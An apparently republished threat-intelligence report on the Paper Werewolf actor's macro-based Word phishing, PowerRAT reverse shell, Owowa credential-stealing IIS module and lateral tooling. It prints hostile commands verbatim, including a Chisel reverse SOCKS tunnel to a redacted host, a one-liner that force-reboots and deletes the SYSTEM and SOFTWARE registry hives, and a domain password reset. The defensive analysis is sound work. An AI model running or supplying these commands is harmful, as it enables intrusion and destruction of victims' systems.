Summary: The Paper Werewolf threat actor utilizes malicious Microsoft Word documents with macros to execute attacks, often employing the Gophish framework for phishing campaigns. This sophisticated method involves encrypted payloads and various tactics for persistence and command execution.
Threat Actor: Paper Werewolf | Paper Werewolf
Victim: Various organizations | various organizations
Key Point :
- Malicious Word documents are distributed via phishing emails, prompting victims to enable macros.
- The payload is encrypted and decrypted using special character replacements, leading to the execution of a PowerShell script.
- Persistence is achieved by writing the path of the malicious HTA file into the Windows registry.
- The threat actor employs environment variables to conceal malicious programs and monitor document openings.
- Advanced techniques include using a malicious IIS module to intercept credentials and creating redundant access channels to the compromised infrastructure.
Paper Werewolf uses Microsoft Word documents that contain a malicious macro. Such files are likely distributed via phishing emails.
It is noteworthy that the adversaries often apply the Gophish open‑source framework to organize their mailings. The framework is designed for testing enterprise vulnerability to phishing.
Example of a phishing email sent by the attackers
Link pointing to the use of Gophish
The distributed files are masked as documents from various organizations (a research institution, a municipal administration, a power grid company, etc.).
As the malicious file is encrypted, the victim is prompted to allow macros.
Encrypted content of a malicious document
Once the victim allows macros, the document content is decrypted.
Decrypted content of a malicious document
The document is decrypted by replacing special characters with respective Russian letters.
Document decryption
Searching for the payload within the document starts after the DigitalRSASignature keystring. The payload is Base64‑encrypted and has two parts divided by a CHECKSUM string.
Encrypted payload
The macro decrypts the payload and writes it into two files:
%USERPROFILE%UserCache.ini(PowerShell script)%USERPROFILE%UserCache.ini.hta(HTA)
To gain persistence in the compromised system, the path to UserCache.ini.hta is written into the following registry parameter:
HKEY_CURRENT_USERSOFTWAREMicrosoftWindowsNTCurrentVersionWindowsLOAD
To conceal the malicious programs in the compromised system, the threat actor uses environment variables:
-
AZURE_RESOURCE_GROUP=JAB0AHkAegBmAHQAbgBnAGkAYgBpACAAPQAgACgARwBlAHQALQBEA[redacted] -
ONEDRIVE_RESOURCE_GROUP=AuADAAIABTAGEAZgBhAHIAaQAvADUAMwA3AC4AMwAiACkAOwA[redacted] -
VB=VBScript -
AZURE_DECODE=[System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($env:AZURE_RESOURCE_GROUP+$env:ONEDRIVE_RESOURCE_GROUP))
In one of the cases, the malicious document contained a link to a 1×1 pixel image. Using this trick, the attackers can monitor whether the victim has opened the malicious document.
The HTA file creates and runs a file %USERPROFILE%UserCacheHelper.lnk.js to execute the PowerShell script %USERPROFILE%UserCache.ini.
The encrypted content of UserCache.ini is a reverse shell being a PowerShell script known as PowerRAT, which:
- installs a
Hiddenattribute for theUserCache.iniandUserCache.ini.htafiles - calls the server
hxxp://[redacted]:80/api/texts/<victim_id>for commands, wherevictim_idstands for[computer name]_[username]_[serial number of the system disk].
These are XML commands with the attributes below:CountRuns, a command runs counterInterval, a command interval in minutesModule, a Base64-encoded command (a PowerShell script)
- runs the command received from the server, which is launched through
Invoke‑Expression
In other attacks, the adversaries use their own loader mimicking explorer.exe. The malicious program loads and opens a decoy document. The decoy is written into the %TEMP% directory. Then the loader sends an HTTP POST request to the server to advance to the next stage. As of the date of this article, the next stage was not available for research, but we suppose that it involves a Mythic framework agent developed by the adversaries, known as PowerTaskel and QwakMyAgent. The function names in the loader are hashed with the Fowler–Noll–Vo algorithm.
Curiously enough, the attackers use this implant along with another framework agent, Freyja.
The threat actor’s arsenal also has a malicious IIS module Owowa that enables them to retrieve credentials during user authorization in the Outlook Web Access (OWA) service. The retrieved data is stored in the RAM in HashSet.
Example of data intercepted by Owowa
One of the Owowa modules would return a Base‑64‑encrypted dataset where the request header contains the username ZaDS0tojX0VDh82, and would delete the content of the decrypted dataset and return an Ok string (RSA‑encrypted) where the request header contains the username oACgTsBMliysfk.
To create a redundant access channel to the compromised IT infrastructure, the attackers resort to Chisel:
mastc.exe client --tls-skip-verify -v https://[redacted]:49611 R:socks
They probably use PsExec to run commands in remote systems. In particular, to perform destructive actions:
cmd.exe /c 'shutdown /r /f /t 5 && reg delete HKEY_LOCAL_MACHINESYSTEM /f && reg delete HKEY_LOCAL_MACHINESOFTWARE /f'
To hinder the staff’s interaction with the compromised IT infrastructure, the criminals change account passwords:
net user [redacted] [redacted] /domain
In the cases above, the attackers use a PowerShell script to run commands.
Views: 1